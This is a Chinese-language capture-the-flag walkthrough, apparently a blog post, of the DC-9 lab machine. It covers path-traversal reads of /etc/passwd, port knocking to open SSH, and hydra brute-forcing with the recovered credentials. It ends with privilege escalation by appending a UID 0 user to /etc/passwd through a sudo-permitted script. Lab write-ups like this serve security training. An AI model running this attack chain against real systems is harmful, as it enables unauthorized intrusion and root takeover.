1、文件包含:
http://192.168.142.139/welcome.php?file=../../../../../../../../../etc/passwd
2、敲门服务:
http://192.168.178.135/manage.php?file=../../../../../../../../../etc/knockd.conf
[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
敲门的判断
nmap -P 22 192.168.178.135
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
nc -nv 192.168.178.135 7469
nc -nv 192.168.178.135 8475
nc -nv 192.168.178.135 9842或者
nmap -p 7469 192.168.178.135
nmap -p 8475 192.168.178.135
nmap -p 9842 192.168.178.135
nmap -P 22 192.168.178.135
PORT STATE SERVICE
22/tcp open ssh //已经打开
80/tcp open http
3、hydra暴力破解SSH用户名密码:
hydra -L user-dict -P pass-dict 192.168.178.135 ssh
或者hydra -L user-dict -P pass-dict ssh://192.168.178.135
[22][ssh] host: 192.168.178.135 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.178.135 login: janitor password: Ilovepeepee
4、SSH登录
ssh [email protected]
ls -a //发现隐藏文件目录.secrets-for-putin/passwords-found-on-post-it-notes.txt
打开发现密码字典
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
加入pass-dict继续重新破解
hydra -L user-dict -P pass-dict 192.168.178.135 ssh
发现另一个用户(登录)
ssh [email protected] --B4-Tru3-001
sudo -l
发现发现可以无密码root身份运行test脚本
cd /opt/devstuff/dist/test/
./test
Usage: python test.py read append
find / -name test.py 2>/dev/null //发现文件/opt/devstuff/test.py
fredf@dc-9:/opt/devstuff/dist/test$ cat /opt/devstuff/test.py
#!/usr/bin/python import sys if len (sys.argv) != 3 : print ("Usage: python test.py read append") sys.exit (1) else : f = open(sys.argv[1], "r") output = (f.read()) f = open(sys.argv[2], "a") f.write(output) f.close()
//分析文件,作用将一个文件内容追加到另一个文件中
怎么办?分析可以创建一个拥有root权限的新用户,再将信息通过这个test.py写入到/etc/passwd
干吧!
5、使用openssl先创建一个本地加密用户
openssl passwd -1 -salt admin 123456 // -1 的意思是使用md5加密算法 // -salt 自动插入一个随机数作为文件内容加密
$1$admin$LClYcRe.ee8dQwgrFc5nz.
6、提权
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
cd /opt/devstuff/dist/test/
sudo ./test /tmp/passwd /etc/passwd 追加root权限的用户
su admin 输入密码123456
whoami
cd /root
ls -a
cat theflag.txt
标签:178.135,..,DC,192.168,dict,ssh,test From: https://www.cnblogs.com/boomomg/p/16597383.html